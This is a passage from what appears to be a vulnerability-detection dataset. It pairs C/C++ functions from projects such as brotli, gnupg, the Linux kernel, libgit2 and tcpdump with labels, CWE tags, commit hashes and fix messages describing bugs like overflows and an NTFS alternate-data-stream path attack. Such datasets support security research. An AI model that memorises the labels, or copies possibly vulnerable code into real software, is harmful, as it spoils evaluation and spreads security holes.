BROTLI_MAX_DICTIONARY_WORD_LENGTH) { int address = s->distance_code - s->max_distance - 1; const BrotliDictionary* words = s->dictionary; const BrotliTransforms* transforms = s->transforms; int offset = (int)s->dictionary->offsets_by_length[i]; uint32_t shift = s->dictionary->size_bits_by_length[i]; int mask = (int)BitMask(shift); int word_idx = address & mask; int transform_idx = address >> shift; /* Compensate double distance-ring-buffer roll. */ s->dist_rb_idx += s->distance_context; offset += word_idx * i; if (BROTLI_PREDICT_FALSE(!words->data)) { return BROTLI_FAILURE(BROTLI_DECODER_ERROR_DICTIONARY_NOT_SET); } if (transform_idx < (int)transforms->num_transforms) { const uint8_t* word = &words->data[offset]; int len = i; if (transform_idx == transforms->cutOffTransforms[0]) { memcpy(&s->ringbuffer[pos], word, (size_t)len); BROTLI_LOG(("[ProcessCommandsInternal] dictionary word: [%.*s]\n", len, word)); } else { len = BrotliTransformDictionaryWord(&s->ringbuffer[pos], word, len, transforms, transform_idx); BROTLI_LOG(("[ProcessCommandsInternal] dictionary word: [%.*s]," " transform_idx = %d, transformed: [%.*s]\n", i, word, transform_idx, len, &s->ringbuffer[pos])); } pos += len; s->meta_block_remaining_len -= len; if (pos >= s->ringbuffer_size) { s->state = BROTLI_STATE_COMMAND_POST_WRITE_1; goto saveStateAndReturn; } } else { BROTLI_LOG(("Invalid backward reference. pos: %d distance: %d " "len: %d bytes left: %d\n", pos, s->distance_code, i, s->meta_block_remaining_len)); return BROTLI_FAILURE(BROTLI_DECODER_ERROR_FORMAT_TRANSFORM); } } else { BROTLI_LOG(("Invalid backward reference. 
pos: %d distance: %d " "len: %d bytes left: %d\n", pos, s->distance_code, i, s->meta_block_remaining_len)); return BROTLI_FAILURE(BROTLI_DECODER_ERROR_FORMAT_DICTIONARY); } } else { int src_start = (pos - s->distance_code) & s->ringbuffer_mask; uint8_t* copy_dst = &s->ringbuffer[pos]; uint8_t* copy_src = &s->ringbuffer[src_start]; int dst_end = pos + i; int src_end = src_start + i; /* Update the recent distances cache. */ s->dist_rb[s->dist_rb_idx & 3] = s->distance_code; ++s->dist_rb_idx; s->meta_block_remaining_len -= i; /* There are 32+ bytes of slack in the ring-buffer allocation. Also, we have 16 short codes, that make these 16 bytes irrelevant in the ring-buffer. Let's copy over them as a first guess. */ memmove16(copy_dst, copy_src); if (src_end > pos && dst_end > src_start) { /* Regions intersect. */ goto CommandPostWrapCopy; } if (dst_end >= s->ringbuffer_size || src_end >= s->ringbuffer_size) { /* At least one region wraps. */ goto CommandPostWrapCopy; } pos += i; if (i > 16) { if (i > 32) { memcpy(copy_dst + 16, copy_src + 16, (size_t)(i - 16)); } else { /* This branch covers about 45% cases. Fixed size short copy allows more compiler optimizations. */ memmove16(copy_dst + 16, copy_src + 16); } } } BROTLI_LOG_UINT(s->meta_block_remaining_len); if (s->meta_block_remaining_len <= 0) { /* Next metablock, if any. */ s->state = BROTLI_STATE_METABLOCK_DONE; goto saveStateAndReturn; } else { goto CommandBegin; } CommandPostWrapCopy: { int wrap_guard = s->ringbuffer_size - pos; while (--i >= 0) { s->ringbuffer[pos] = s->ringbuffer[(pos - s->distance_code) & s->ringbuffer_mask]; ++pos; if (BROTLI_PREDICT_FALSE(--wrap_guard == 0)) { s->state = BROTLI_STATE_COMMAND_POST_WRITE_2; goto saveStateAndReturn; } } } if (s->meta_block_remaining_len <= 0) { /* Next metablock, if any. */ s->state = BROTLI_STATE_METABLOCK_DONE; goto saveStateAndReturn; } else { goto CommandBegin; } saveStateAndReturn: s->pos = pos; s->loop_counter = i; return result; }
0
[ "CWE-120" ]
brotli
223d80cfbec8fd346e32906c732c8ede21f0cea6
146,653,028,540,721,590,000,000,000,000,000,000,000
288
Update (#826) * IMPORTANT: decoder: fix potential overflow when input chunk is >2GiB * simplify max Huffman table size calculation * eliminate symbol duplicates (static arrays in .h files) * minor combing in research/ code
PHP_FUNCTION(tanh) { double num; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "d", &num) == FAILURE) { return; } RETURN_DOUBLE(tanh(num)); }
0
[]
php-src
0d822f6df946764f3f0348b82efae2e1eaa83aa0
310,299,786,127,503,830,000,000,000,000,000,000,000
9
Bug #71201 round() segfault on 64-bit builds
static int __ip6_del_rt(struct rt6_info *rt, struct nl_info *info) { int err; struct fib6_table *table; struct net *net = dev_net(rt->dst.dev); if (rt == net->ipv6.ip6_null_entry) { err = -ENOENT; goto out; } table = rt->rt6i_table; write_lock_bh(&table->tb6_lock); err = fib6_del(rt, info); write_unlock_bh(&table->tb6_lock); out: ip6_rt_put(rt); return err; }
0
[ "CWE-119" ]
net
c88507fbad8055297c1d1e21e599f46960cbee39
148,217,808,698,948,080,000,000,000,000,000,000,000
20
ipv6: don't set DST_NOCOUNT for remotely added routes DST_NOCOUNT should only be used if an authorized user adds routes locally. In case of routes which are added on behalf of router advertisments this flag must not get used as it allows an unlimited number of routes getting added remotely. Signed-off-by: Sabrina Dubroca <[email protected]> Acked-by: Hannes Frederic Sowa <[email protected]> Signed-off-by: David S. Miller <[email protected]>
compress_filter( void *opaque, int control, IOBUF a, byte *buf, size_t *ret_len) { size_t size = *ret_len; compress_filter_context_t *zfx = opaque; z_stream *zs = zfx->opaque; int rc=0; if( control == IOBUFCTRL_UNDERFLOW ) { if( !zfx->status ) { zs = zfx->opaque = xmalloc_clear( sizeof *zs ); init_uncompress( zfx, zs ); zfx->status = 1; } zs->next_out = BYTEF_CAST (buf); zs->avail_out = size; zfx->outbufsize = size; /* needed only for calculation */ rc = do_uncompress( zfx, zs, a, ret_len ); } else if( control == IOBUFCTRL_FLUSH ) { if( !zfx->status ) { PACKET pkt; PKT_compressed cd; if(zfx->algo != COMPRESS_ALGO_ZIP && zfx->algo != COMPRESS_ALGO_ZLIB) BUG(); memset( &cd, 0, sizeof cd ); cd.len = 0; cd.algorithm = zfx->algo; init_packet( &pkt ); pkt.pkttype = PKT_COMPRESSED; pkt.pkt.compressed = &cd; if( build_packet( a, &pkt )) log_bug("build_packet(PKT_COMPRESSED) failed\n"); zs = zfx->opaque = xmalloc_clear( sizeof *zs ); init_compress( zfx, zs ); zfx->status = 2; } zs->next_in = BYTEF_CAST (buf); zs->avail_in = size; rc = do_compress( zfx, zs, Z_NO_FLUSH, a ); } else if( control == IOBUFCTRL_FREE ) { if( zfx->status == 1 ) { inflateEnd(zs); xfree(zs); zfx->opaque = NULL; xfree(zfx->outbuf); zfx->outbuf = NULL; } else if( zfx->status == 2 ) { zs->next_in = BYTEF_CAST (buf); zs->avail_in = 0; do_compress( zfx, zs, Z_FINISH, a ); deflateEnd(zs); xfree(zs); zfx->opaque = NULL; xfree(zfx->outbuf); zfx->outbuf = NULL; } if (zfx->release) zfx->release (zfx); } else if( control == IOBUFCTRL_DESC ) *(char**)buf = "compress_filter"; return rc; }
0
[ "CWE-20" ]
gnupg
014b2103fcb12f261135e3954f26e9e07b39e342
261,773,657,730,974,570,000,000,000,000,000,000,000
67
gpg: Avoid infinite loop in uncompressing garbled packets. * g10/compress.c (do_uncompress): Limit the number of extra FF bytes. -- A packet like (a3 01 5b ff) leads to an infinite loop. Using --max-output won't help if it is a partial packet. This patch actually fixes a regression introduced on 1999-05-31 (c34c6769). Actually it would be sufficient to stuff just one extra 0xff byte. Given that this problem popped up only after 15 years, I feel safer to allow for a very few FF bytes. Thanks to Olivier Levillain and Florian Maury for their detailed report.
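Editor's note: the GnuPG message describes capping the number of synthetic 0xFF pad bytes the decompressor may inject, so a truncated or garbled packet cannot keep the inflate loop running forever. A small hedged sketch of that cap, with invented names and an arbitrary limit rather than GnuPG's actual logic, follows:

```c
#include <stdio.h>

/* Illustrative only: when a decoder pads truncated input with synthetic
 * 0xFF bytes to let the decompressor finish, cap how many such bytes may be
 * injected so malformed input cannot keep the refill loop running forever. */
#define MAX_EXTRA_FF 64         /* arbitrary small cap for this sketch */

int next_byte(FILE *in, int *extra_ff_used)
{
    int c = fgetc(in);
    if (c != EOF)
        return c;
    if (*extra_ff_used >= MAX_EXTRA_FF)
        return -1;              /* give up instead of looping forever */
    (*extra_ff_used)++;
    return 0xFF;
}
```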
static int su3000_read_mac_address(struct dvb_usb_device *d, u8 mac[6]) { int i; u8 obuf[] = { 0x1f, 0xf0 }; u8 ibuf[] = { 0 }; struct i2c_msg msg[] = { { .addr = 0x51, .flags = 0, .buf = obuf, .len = 2, }, { .addr = 0x51, .flags = I2C_M_RD, .buf = ibuf, .len = 1, } }; for (i = 0; i < 6; i++) { obuf[1] = 0xf0 + i; if (i2c_transfer(&d->i2c_adap, msg, 2) != 2) break; else mac[i] = ibuf[0]; } return 0; }
0
[ "CWE-476", "CWE-119" ]
linux
606142af57dad981b78707234cfbd15f9f7b7125
152,604,341,697,206,690,000,000,000,000,000,000,000
30
[media] dw2102: don't do DMA on stack On Kernel 4.9, WARNINGs about doing DMA on stack are hit at the dw2102 driver: one in su3000_power_ctrl() and the other in tt_s2_4600_frontend_attach(). Both were due to the use of buffers on the stack as parameters to dvb_usb_generic_rw() and the resulting attempt to do DMA with them. The device was non-functional as a result. So, switch this driver over to use a buffer within the device state structure, as has been done with other DVB-USB drivers. Tested with TechnoTrend TT-connect S2-4600. [[email protected]: fixed a warning at su3000_i2c_transfer() that state var were dereferenced before check 'd'] Signed-off-by: Jonathan McDowell <[email protected]> Cc: <[email protected]> Signed-off-by: Mauro Carvalho Chehab <[email protected]>
static int check_id(X509_STORE_CTX *ctx) { X509_VERIFY_PARAM *vpm = ctx->param; X509_VERIFY_PARAM_ID *id = vpm->id; X509 *x = ctx->cert; if (id->hosts && check_hosts(x, id) <= 0) { if (!check_id_error(ctx, X509_V_ERR_HOSTNAME_MISMATCH)) return 0; } if (id->email && X509_check_email(x, id->email, id->emaillen, 0) <= 0) { if (!check_id_error(ctx, X509_V_ERR_EMAIL_MISMATCH)) return 0; } if (id->ip && X509_check_ip(x, id->ip, id->iplen, 0) <= 0) { if (!check_id_error(ctx, X509_V_ERR_IP_ADDRESS_MISMATCH)) return 0; } return 1; }
0
[]
openssl
a3baa171053547488475709c7197592c66e427cf
133,153,582,274,553,870,000,000,000,000,000,000,000
19
Fix missing ok=0 with locally blacklisted CAs Also in X509_verify_cert() avoid using "i" not only as a loop counter, but also as a trust outcome and as an error ordinal. Finally, make sure that all "goto end" jumps return an error, with "end" renamed to "err" accordingly. [ The 1.1.0 version of X509_verify_cert() is major rewrite, which addresses these issues in a more systemic way. ] Reviewed-by: Rich Salz <[email protected]>
enum_field_types field_type() const { return Type_handler_hybrid_real_field_type::field_type(); }
0
[ "CWE-617" ]
server
2e7891080667c59ac80f788eef4d59d447595772
99,857,564,481,347,330,000,000,000,000,000,000,000
2
MDEV-25635 Assertion failure when pushing from HAVING into WHERE of view This bug could manifest itself after pushing a where condition over a mergeable derived table / view / CTE DT into a grouping view / derived table / CTE V whose item list contained set functions with constant arguments such as MIN(2), SUM(1) etc. In such cases the field references used in the condition pushed into the view V that correspond set functions are wrapped into Item_direct_view_ref wrappers. Due to a wrong implementation of the virtual method const_item() for the class Item_direct_view_ref the wrapped set functions with constant arguments could be erroneously taken for constant items. This could lead to a wrong result set returned by the main select query in 10.2. In 10.4 where a possibility of pushing condition from HAVING into WHERE had been added this could cause a crash. Approved by Sergey Petrunya <[email protected]>
GF_Err tfhd_Size(GF_Box *s) { GF_TrackFragmentHeaderBox *ptr = (GF_TrackFragmentHeaderBox *)s; ptr->size += 4; //The rest depends on the flags if (ptr->flags & GF_ISOM_TRAF_BASE_OFFSET) ptr->size += 8; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_DESC) ptr->size += 4; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_DUR) ptr->size += 4; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_SIZE) ptr->size += 4; if (ptr->flags & GF_ISOM_TRAF_SAMPLE_FLAGS) ptr->size += 4; return GF_OK; }
0
[ "CWE-400", "CWE-401" ]
gpac
d2371b4b204f0a3c0af51ad4e9b491144dd1225c
252,523,142,255,507,150,000,000,000,000,000,000,000
13
prevent dref memleak on invalid input (#1183)
static void nf_tables_rule_destroy(const struct nft_ctx *ctx, struct nft_rule *rule) { struct nft_expr *expr; /* * Careful: some expressions might not be initialized in case this * is called on error from nf_tables_newrule(). */ expr = nft_expr_first(rule); while (expr->ops && expr != nft_expr_last(rule)) { nf_tables_expr_destroy(ctx, expr); expr = nft_expr_next(expr); } kfree(rule); }
0
[ "CWE-19" ]
nf
a2f18db0c68fec96631c10cad9384c196e9008ac
201,510,627,087,753,970,000,000,000,000,000,000,000
16
netfilter: nf_tables: fix flush ruleset chain dependencies Jumping between chains doesn't mix well with flush ruleset. Rules from a different chain and set elements may still refer to us. [ 353.373791] ------------[ cut here ]------------ [ 353.373845] kernel BUG at net/netfilter/nf_tables_api.c:1159! [ 353.373896] invalid opcode: 0000 [#1] SMP [ 353.373942] Modules linked in: intel_powerclamp uas iwldvm iwlwifi [ 353.374017] CPU: 0 PID: 6445 Comm: 31c3.nft Not tainted 3.18.0 #98 [ 353.374069] Hardware name: LENOVO 5129CTO/5129CTO, BIOS 6QET47WW (1.17 ) 07/14/2010 [...] [ 353.375018] Call Trace: [ 353.375046] [<ffffffff81964c31>] ? nf_tables_commit+0x381/0x540 [ 353.375101] [<ffffffff81949118>] nfnetlink_rcv+0x3d8/0x4b0 [ 353.375150] [<ffffffff81943fc5>] netlink_unicast+0x105/0x1a0 [ 353.375200] [<ffffffff8194438e>] netlink_sendmsg+0x32e/0x790 [ 353.375253] [<ffffffff818f398e>] sock_sendmsg+0x8e/0xc0 [ 353.375300] [<ffffffff818f36b9>] ? move_addr_to_kernel.part.20+0x19/0x70 [ 353.375357] [<ffffffff818f44f9>] ? move_addr_to_kernel+0x19/0x30 [ 353.375410] [<ffffffff819016d2>] ? verify_iovec+0x42/0xd0 [ 353.375459] [<ffffffff818f3e10>] ___sys_sendmsg+0x3f0/0x400 [ 353.375510] [<ffffffff810615fa>] ? native_sched_clock+0x2a/0x90 [ 353.375563] [<ffffffff81176697>] ? acct_account_cputime+0x17/0x20 [ 353.375616] [<ffffffff8110dc78>] ? account_user_time+0x88/0xa0 [ 353.375667] [<ffffffff818f4bbd>] __sys_sendmsg+0x3d/0x80 [ 353.375719] [<ffffffff81b184f4>] ? int_check_syscall_exit_work+0x34/0x3d [ 353.375776] [<ffffffff818f4c0d>] SyS_sendmsg+0xd/0x20 [ 353.375823] [<ffffffff81b1826d>] system_call_fastpath+0x16/0x1b Release objects in this order: rules -> sets -> chains -> tables, to make sure no references to chains are held anymore. Reported-by: Asbjoern Sloth Toennesen <[email protected]> Signed-off-by: Pablo Neira Ayuso <[email protected]>
TEST_P(DownstreamProtocolIntegrationTest, RetryPriority) { const Upstream::HealthyLoad healthy_priority_load({0u, 100u}); const Upstream::DegradedLoad degraded_priority_load({0u, 100u}); NiceMock<Upstream::MockRetryPriority> retry_priority(healthy_priority_load, degraded_priority_load); Upstream::MockRetryPriorityFactory factory(retry_priority); Registry::InjectFactory<Upstream::RetryPriorityFactory> inject_factory(factory); // Add route with custom retry policy auto host = config_helper_.createVirtualHost("host", "/test_retry"); host.set_include_request_attempt_count(true); auto retry_policy = host.mutable_routes(0)->mutable_route()->mutable_retry_policy(); retry_policy->mutable_retry_priority()->set_name(factory.name()); config_helper_.addVirtualHost(host); // Use load assignments instead of static hosts. Necessary in order to use priorities. config_helper_.addConfigModifier([](envoy::config::bootstrap::v2::Bootstrap& bootstrap) { auto cluster = bootstrap.mutable_static_resources()->mutable_clusters(0); auto load_assignment = cluster->mutable_load_assignment(); load_assignment->set_cluster_name(cluster->name()); const auto& host_address = cluster->hosts(0).socket_address().address(); for (int i = 0; i < 2; ++i) { auto locality = load_assignment->add_endpoints(); locality->set_priority(i); locality->mutable_locality()->set_region("region"); locality->mutable_locality()->set_zone("zone"); locality->mutable_locality()->set_sub_zone("sub_zone" + std::to_string(i)); auto lb_endpoint = locality->add_lb_endpoints(); lb_endpoint->mutable_endpoint()->mutable_address()->mutable_socket_address()->set_address( host_address); lb_endpoint->mutable_endpoint()->mutable_address()->mutable_socket_address()->set_port_value( 0); } cluster->clear_hosts(); }); fake_upstreams_count_ = 2; initialize(); codec_client_ = makeHttpConnection(lookupPort("http")); auto response = codec_client_->makeRequestWithBody(Http::TestHeaderMapImpl{{":method", "POST"}, {":path", "/test_retry"}, {":scheme", "http"}, {":authority", "host"}, {"x-forwarded-for", "10.0.0.1"}, {"x-envoy-retry-on", "5xx"}}, 1024); // Note how we're expecting each upstream request to hit the same upstream. waitForNextUpstreamRequest(0); upstream_request_->encodeHeaders(Http::TestHeaderMapImpl{{":status", "503"}}, false); if (fake_upstreams_[0]->httpType() == FakeHttpConnection::Type::HTTP1) { ASSERT_TRUE(fake_upstream_connection_->waitForDisconnect()); ASSERT_TRUE(fake_upstreams_[1]->waitForHttpConnection(*dispatcher_, fake_upstream_connection_)); } else { ASSERT_TRUE(upstream_request_->waitForReset()); } waitForNextUpstreamRequest(1); upstream_request_->encodeHeaders(default_response_headers_, false); upstream_request_->encodeData(512, true); response->waitForEndStream(); EXPECT_TRUE(upstream_request_->complete()); EXPECT_EQ(1024U, upstream_request_->bodyLength()); EXPECT_TRUE(response->complete()); EXPECT_EQ("200", response->headers().Status()->value().getStringView()); EXPECT_EQ(512U, response->body().size()); }
0
[ "CWE-400", "CWE-703" ]
envoy
afc39bea36fd436e54262f150c009e8d72db5014
235,506,016,123,213,600,000,000,000,000,000,000,000
74
Track byteSize of HeaderMap internally. Introduces a cached byte size updated internally in HeaderMap. The value is stored as an optional, and is cleared whenever a non-const pointer or reference to a HeaderEntry is accessed. The cached value can be set with refreshByteSize() which performs an iteration over the HeaderMap to sum the size of each key and value in the HeaderMap. Signed-off-by: Asra Ali <[email protected]>
extern int git_path_is_gitfile(const char *path, size_t pathlen, git_path_gitfile gitfile, git_path_fs fs) { const char *file, *hash; size_t filelen; if (!(gitfile >= GIT_PATH_GITFILE_GITIGNORE && gitfile < ARRAY_SIZE(gitfiles))) { git_error_set(GIT_ERROR_OS, "invalid gitfile for path validation"); return -1; } file = gitfiles[gitfile].file; filelen = gitfiles[gitfile].filelen; hash = gitfiles[gitfile].hash; switch (fs) { case GIT_PATH_FS_GENERIC: return !verify_dotgit_ntfs_generic(path, pathlen, file, filelen, hash) || !verify_dotgit_hfs_generic(path, pathlen, file, filelen); case GIT_PATH_FS_NTFS: return !verify_dotgit_ntfs_generic(path, pathlen, file, filelen, hash); case GIT_PATH_FS_HFS: return !verify_dotgit_hfs_generic(path, pathlen, file, filelen); default: git_error_set(GIT_ERROR_OS, "invalid filesystem for path validation"); return -1; } }
0
[ "CWE-20", "CWE-706" ]
libgit2
3f7851eadca36a99627ad78cbe56a40d3776ed01
173,905,802,721,583,930,000,000,000,000,000,000,000
27
Disallow NTFS Alternate Data Stream attacks, even on Linux/macOS A little-known feature of NTFS is that it offers to store metadata in so-called "Alternate Data Streams" (inspired by Apple's "resource forks") that are copied together with the file they are associated with. These Alternate Data Streams can be accessed via `<file name>:<stream name>:<stream type>`. Directories, too, have Alternate Data Streams, and they even have a default stream type `$INDEX_ALLOCATION`. Which means that `abc/` and `abc::$INDEX_ALLOCATION/` are actually equivalent. This is of course another attack vector on the Git directory that we definitely want to prevent. On Windows, we already do this incidentally, by disallowing colons in file/directory names. While it looks as if files'/directories' Alternate Data Streams are not accessible in the Windows Subsystem for Linux, and neither via CIFS/SMB-mounted network shares in Linux, it _is_ possible to access them on SMB-mounted network shares on macOS. Therefore, let's go the extra mile and prevent this particular attack _everywhere_. To keep things simple, let's just disallow *any* Alternate Data Stream of `.git`. This is libgit2's variant of CVE-2019-1352. Signed-off-by: Johannes Schindelin <[email protected]>
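Editor's note: the libgit2 message explains that on NTFS (and on some network filesystems) ".git" plus an Alternate Data Stream suffix such as "::$INDEX_ALLOCATION" still names the .git directory, so the check has to treat any ".git:<stream>" component as ".git". A standalone sketch of that comparison, which is an illustration and not libgit2's verify_dotgit_* code, is shown below:

```c
#include <stdio.h>
#include <ctype.h>

/* Illustrative only: treat a path component as ".git" even when an NTFS
 * Alternate Data Stream suffix is appended, i.e. reject ".git", ".GIT:foo",
 * ".git::$INDEX_ALLOCATION", and so on (case-insensitively). */
int component_is_dotgit(const char *comp)
{
    for (int i = 0; i < 4; i++) {
        if (comp[i] == '\0' || tolower((unsigned char)comp[i]) != ".git"[i])
            return 0;
    }
    return comp[4] == '\0' || comp[4] == ':';
}

int main(void)
{
    printf("%d %d %d\n",
           component_is_dotgit(".git"),
           component_is_dotgit(".GIT::$INDEX_ALLOCATION"),
           component_is_dotgit(".gitignore"));   /* prints: 1 1 0 */
    return 0;
}
```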
rfc1048_print(netdissect_options *ndo, register const u_char *bp) { register uint16_t tag; register u_int len; register const char *cp; register char c; int first, idx; uint32_t ul; uint16_t us; uint8_t uc, subopt, suboptlen; ND_PRINT((ndo, "\n\t Vendor-rfc1048 Extensions")); /* Step over magic cookie */ ND_PRINT((ndo, "\n\t Magic Cookie 0x%08x", EXTRACT_32BITS(bp))); bp += sizeof(int32_t); /* Loop while we there is a tag left in the buffer */ while (ND_TTEST2(*bp, 1)) { tag = *bp++; if (tag == TAG_PAD && ndo->ndo_vflag < 3) continue; if (tag == TAG_END && ndo->ndo_vflag < 3) return; if (tag == TAG_EXTENDED_OPTION) { ND_TCHECK2(*(bp + 1), 2); tag = EXTRACT_16BITS(bp + 1); /* XXX we don't know yet if the IANA will * preclude overlap of 1-byte and 2-byte spaces. * If not, we need to offset tag after this step. */ cp = tok2str(xtag2str, "?xT%u", tag); } else cp = tok2str(tag2str, "?T%u", tag); c = *cp++; if (tag == TAG_PAD || tag == TAG_END) len = 0; else { /* Get the length; check for truncation */ ND_TCHECK2(*bp, 1); len = *bp++; } ND_PRINT((ndo, "\n\t %s Option %u, length %u%s", cp, tag, len, len > 0 ? ": " : "")); if (tag == TAG_PAD && ndo->ndo_vflag > 2) { u_int ntag = 1; while (ND_TTEST2(*bp, 1) && *bp == TAG_PAD) { bp++; ntag++; } if (ntag > 1) ND_PRINT((ndo, ", occurs %u", ntag)); } if (!ND_TTEST2(*bp, len)) { ND_PRINT((ndo, "[|rfc1048 %u]", len)); return; } if (tag == TAG_DHCP_MESSAGE && len == 1) { uc = *bp++; ND_PRINT((ndo, "%s", tok2str(dhcp_msg_values, "Unknown (%u)", uc))); continue; } if (tag == TAG_PARM_REQUEST) { idx = 0; while (len-- > 0) { uc = *bp++; cp = tok2str(tag2str, "?Option %u", uc); if (idx % 4 == 0) ND_PRINT((ndo, "\n\t ")); else ND_PRINT((ndo, ", ")); ND_PRINT((ndo, "%s", cp + 1)); idx++; } continue; } if (tag == TAG_EXTENDED_REQUEST) { first = 1; while (len > 1) { len -= 2; us = EXTRACT_16BITS(bp); bp += 2; cp = tok2str(xtag2str, "?xT%u", us); if (!first) ND_PRINT((ndo, "+")); ND_PRINT((ndo, "%s", cp + 1)); first = 0; } continue; } /* Print data */ if (c == '?') { /* Base default formats for unknown tags on data size */ if (len & 1) c = 'b'; else if (len & 2) c = 's'; else c = 'l'; } first = 1; switch (c) { case 'a': /* ASCII strings */ ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, len, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); bp += len; len = 0; break; case 'i': case 'l': case 'L': /* ip addresses/32-bit words */ while (len >= sizeof(ul)) { if (!first) ND_PRINT((ndo, ",")); ul = EXTRACT_32BITS(bp); if (c == 'i') { ul = htonl(ul); ND_PRINT((ndo, "%s", ipaddr_string(ndo, &ul))); } else if (c == 'L') ND_PRINT((ndo, "%d", ul)); else ND_PRINT((ndo, "%u", ul)); bp += sizeof(ul); len -= sizeof(ul); first = 0; } break; case 'p': /* IP address pairs */ while (len >= 2*sizeof(ul)) { if (!first) ND_PRINT((ndo, ",")); memcpy((char *)&ul, (const char *)bp, sizeof(ul)); ND_PRINT((ndo, "(%s:", ipaddr_string(ndo, &ul))); bp += sizeof(ul); memcpy((char *)&ul, (const char *)bp, sizeof(ul)); ND_PRINT((ndo, "%s)", ipaddr_string(ndo, &ul))); bp += sizeof(ul); len -= 2*sizeof(ul); first = 0; } break; case 's': /* shorts */ while (len >= sizeof(us)) { if (!first) ND_PRINT((ndo, ",")); us = EXTRACT_16BITS(bp); ND_PRINT((ndo, "%u", us)); bp += sizeof(us); len -= sizeof(us); first = 0; } break; case 'B': /* boolean */ while (len > 0) { if (!first) ND_PRINT((ndo, ",")); switch (*bp) { case 0: ND_PRINT((ndo, "N")); break; case 1: ND_PRINT((ndo, "Y")); break; default: ND_PRINT((ndo, "%u?", *bp)); break; } ++bp; --len; first = 0; } break; case 'b': 
case 'x': default: /* Bytes */ while (len > 0) { if (!first) ND_PRINT((ndo, c == 'x' ? ":" : ".")); if (c == 'x') ND_PRINT((ndo, "%02x", *bp)); else ND_PRINT((ndo, "%u", *bp)); ++bp; --len; first = 0; } break; case '$': /* Guys we can't handle with one of the usual cases */ switch (tag) { case TAG_NETBIOS_NODE: /* this option should be at least 1 byte long */ if (len < 1) { ND_PRINT((ndo, "ERROR: length < 1 bytes")); break; } tag = *bp++; --len; ND_PRINT((ndo, "%s", tok2str(nbo2str, NULL, tag))); break; case TAG_OPT_OVERLOAD: /* this option should be at least 1 byte long */ if (len < 1) { ND_PRINT((ndo, "ERROR: length < 1 bytes")); break; } tag = *bp++; --len; ND_PRINT((ndo, "%s", tok2str(oo2str, NULL, tag))); break; case TAG_CLIENT_FQDN: /* this option should be at least 3 bytes long */ if (len < 3) { ND_PRINT((ndo, "ERROR: length < 3 bytes")); bp += len; len = 0; break; } if (*bp) ND_PRINT((ndo, "[%s] ", client_fqdn_flags(*bp))); bp++; if (*bp || *(bp+1)) ND_PRINT((ndo, "%u/%u ", *bp, *(bp+1))); bp += 2; ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, len - 3, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); bp += len - 3; len = 0; break; case TAG_CLIENT_ID: { int type; /* this option should be at least 1 byte long */ if (len < 1) { ND_PRINT((ndo, "ERROR: length < 1 bytes")); break; } type = *bp++; len--; if (type == 0) { ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, len, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); bp += len; len = 0; break; } else { ND_PRINT((ndo, "%s ", tok2str(arp2str, "hardware-type %u,", type))); while (len > 0) { if (!first) ND_PRINT((ndo, ":")); ND_PRINT((ndo, "%02x", *bp)); ++bp; --len; first = 0; } } break; } case TAG_AGENT_CIRCUIT: while (len >= 2) { subopt = *bp++; suboptlen = *bp++; len -= 2; if (suboptlen > len) { ND_PRINT((ndo, "\n\t %s SubOption %u, length %u: length goes past end of option", tok2str(agent_suboption_values, "Unknown", subopt), subopt, suboptlen)); bp += len; len = 0; break; } ND_PRINT((ndo, "\n\t %s SubOption %u, length %u: ", tok2str(agent_suboption_values, "Unknown", subopt), subopt, suboptlen)); switch (subopt) { case AGENT_SUBOPTION_CIRCUIT_ID: /* fall through */ case AGENT_SUBOPTION_REMOTE_ID: case AGENT_SUBOPTION_SUBSCRIBER_ID: if (fn_printn(ndo, bp, suboptlen, ndo->ndo_snapend)) goto trunc; break; default: print_unknown_data(ndo, bp, "\n\t\t", suboptlen); } len -= suboptlen; bp += suboptlen; } break; case TAG_CLASSLESS_STATIC_RT: case TAG_CLASSLESS_STA_RT_MS: { u_int mask_width, significant_octets, i; /* this option should be at least 5 bytes long */ if (len < 5) { ND_PRINT((ndo, "ERROR: length < 5 bytes")); bp += len; len = 0; break; } while (len > 0) { if (!first) ND_PRINT((ndo, ",")); mask_width = *bp++; len--; /* mask_width <= 32 */ if (mask_width > 32) { ND_PRINT((ndo, "[ERROR: Mask width (%d) > 32]", mask_width)); bp += len; len = 0; break; } significant_octets = (mask_width + 7) / 8; /* significant octets + router(4) */ if (len < significant_octets + 4) { ND_PRINT((ndo, "[ERROR: Remaining length (%u) < %u bytes]", len, significant_octets + 4)); bp += len; len = 0; break; } ND_PRINT((ndo, "(")); if (mask_width == 0) ND_PRINT((ndo, "default")); else { for (i = 0; i < significant_octets ; i++) { if (i > 0) ND_PRINT((ndo, ".")); ND_PRINT((ndo, "%d", *bp++)); } for (i = significant_octets ; i < 4 ; i++) ND_PRINT((ndo, ".0")); ND_PRINT((ndo, "/%d", mask_width)); } memcpy((char *)&ul, (const char *)bp, sizeof(ul)); ND_PRINT((ndo, ":%s)", ipaddr_string(ndo, &ul))); bp 
+= sizeof(ul); len -= (significant_octets + 4); first = 0; } break; } case TAG_USER_CLASS: { u_int suboptnumber = 1; first = 1; if (len < 2) { ND_PRINT((ndo, "ERROR: length < 2 bytes")); bp += len; len = 0; break; } while (len > 0) { suboptlen = *bp++; len--; ND_PRINT((ndo, "\n\t ")); ND_PRINT((ndo, "instance#%u: ", suboptnumber)); if (suboptlen == 0) { ND_PRINT((ndo, "ERROR: suboption length must be non-zero")); bp += len; len = 0; break; } if (len < suboptlen) { ND_PRINT((ndo, "ERROR: invalid option")); bp += len; len = 0; break; } ND_PRINT((ndo, "\"")); if (fn_printn(ndo, bp, suboptlen, ndo->ndo_snapend)) { ND_PRINT((ndo, "\"")); goto trunc; } ND_PRINT((ndo, "\"")); ND_PRINT((ndo, ", length %d", suboptlen)); suboptnumber++; len -= suboptlen; bp += suboptlen; } break; } default: ND_PRINT((ndo, "[unknown special tag %u, size %u]", tag, len)); bp += len; len = 0; break; } break; } /* Data left over? */ if (len) { ND_PRINT((ndo, "\n\t trailing data length %u", len)); bp += len; } } return; trunc: ND_PRINT((ndo, 